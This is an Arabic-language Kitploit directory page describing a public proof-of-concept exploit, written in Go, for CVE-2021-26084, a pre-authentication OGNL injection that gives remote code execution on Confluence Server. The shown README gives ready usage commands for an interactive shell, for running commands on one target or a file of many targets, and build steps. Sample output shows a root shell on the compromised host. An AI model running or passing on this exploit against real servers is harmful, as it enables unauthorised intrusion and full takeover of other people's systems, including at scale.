Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-26084 — CVE-2021-26084 - Confluence Server Webwork OGNL injection (Pre-Auth RCE) | Kitploit
أدوات/GitHubGitHub/taythebot/cve-2021-26084
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمأداة الوصول عن بعد
GitHubtaythebot/cve-2021-26084

CVE-2021-26084

CVE-2021-26084 - Confluence Server Webwork OGNL injection (Pre-Auth RCE)

عرض المستودع
862منذ 5 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2021-26084

إثبات المفهوم لـ CVE-2021-26084.

حقن OGNL في Confluence Server Webwork (RCE بدون مصادقة)

إخلاء مسؤولية

هذا للأغراض التعليمية فقط. لست مسؤولاً عن أفعالك. استخدمه على مسؤوليتك الخاصة.

قيود الأوامر

بسبب الحمولة، لا يمكن تمرير بعض الأحرف. القائمة أدناه هي ما وجدته أثناء اختباري.

  • علامات الاقتباس المزدوجة "
  • الشريط العمودي |

واجهة تفاعلية

 go run exploit.go -t <target> -i

مثال

root@localhost:/# go run exploit.go -t http://localhost:8090 -i
CVE-2021-26084 - Confluence Server Webwork OGNL injection
Made by Tay (https://github.com/taythebot)
time="2021-09-02T00:29:37+09:00" level=info msg="Checking if https://localhost:8090 is vulnerable"
time="2021-09-02T00:29:39+09:00" level=info msg="Target https://localhost:8090 is vulnerable"
root@confluence:/# whoami
root
root@confluence:/# exit
Exiting interactive mode, goodbye
  • يعمل فقط على هدف واحد
  • اكتب exit للخروج من الواجهة التفاعلية
  • يظهر إشعار إذا كان الجهاز المحتمل هو Windows

هدف واحد

go run exploit.go -t <target> -c <command>

أهداف متعددة

go run exploit.go -f <file> -c <command>

بناء

go mod download
go build exploit.go
تنزيل الأداة